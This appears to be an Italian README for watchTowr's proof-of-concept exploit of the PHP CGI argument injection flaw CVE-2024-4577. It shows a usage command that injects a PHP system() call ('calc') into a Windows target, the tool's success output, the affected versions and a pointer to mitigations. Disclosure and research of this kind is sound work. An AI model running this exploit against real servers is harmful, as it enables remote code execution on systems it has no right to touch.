
Iniezione di argomenti CGI PHP (CVE-2024-4577) PoC di esecuzione di codice remoto
Un Proof of Concept sviluppato da @watchTowr che sfrutta la vulnerabilità di injection degli argomenti CGI di PHP (CVE-2024-4577) per ottenere RCE su una versione vulnerabile di PHP in esecuzione in ambiente Windows. Analisi tecnica dettagliata di questa vulnerabilità
Questa vulnerabilità è stata scoperta da Orange Tsai (@orange_8361) di DEVCORE (@d3vc0r3). Assicurati di seguire la sua eccezionale ricerca, il nostro ruolo è stato solo quello di ricreare e sviluppare l'exploit per questo problema.
python watchTowr-vs-php_cve-2024-4577.py -c "<?php system('calc');?>" -t http://192.168.253.132/test.sina
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-php_cve-2024-4577.py
(*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
- Aliz Hammond, watchTowr ([email protected])
- Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
CVEs: [CVE-2024-4577]
(^_^) prepare for the Pwnage (^_^)
(+) Exploit was successful
in base al post originale del blog di DEVCORE (@d3vc0r3) Questa vulnerabilità colpisce tutte le versioni di PHP installate sul sistema operativo Windows:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
Poiché i rami PHP 8.0, PHP 7 e PHP 5 sono End-of-Life e non sono più mantenuti, gli amministratori di server possono fare riferimento alla sezione 'Sono vulnerabile?' QUI per trovare raccomandazioni temporanee di patch nella sezione Misure di Mitigazione.
Per le ultime ricerche sulla sicurezza, segui il team dei watchTowr Labs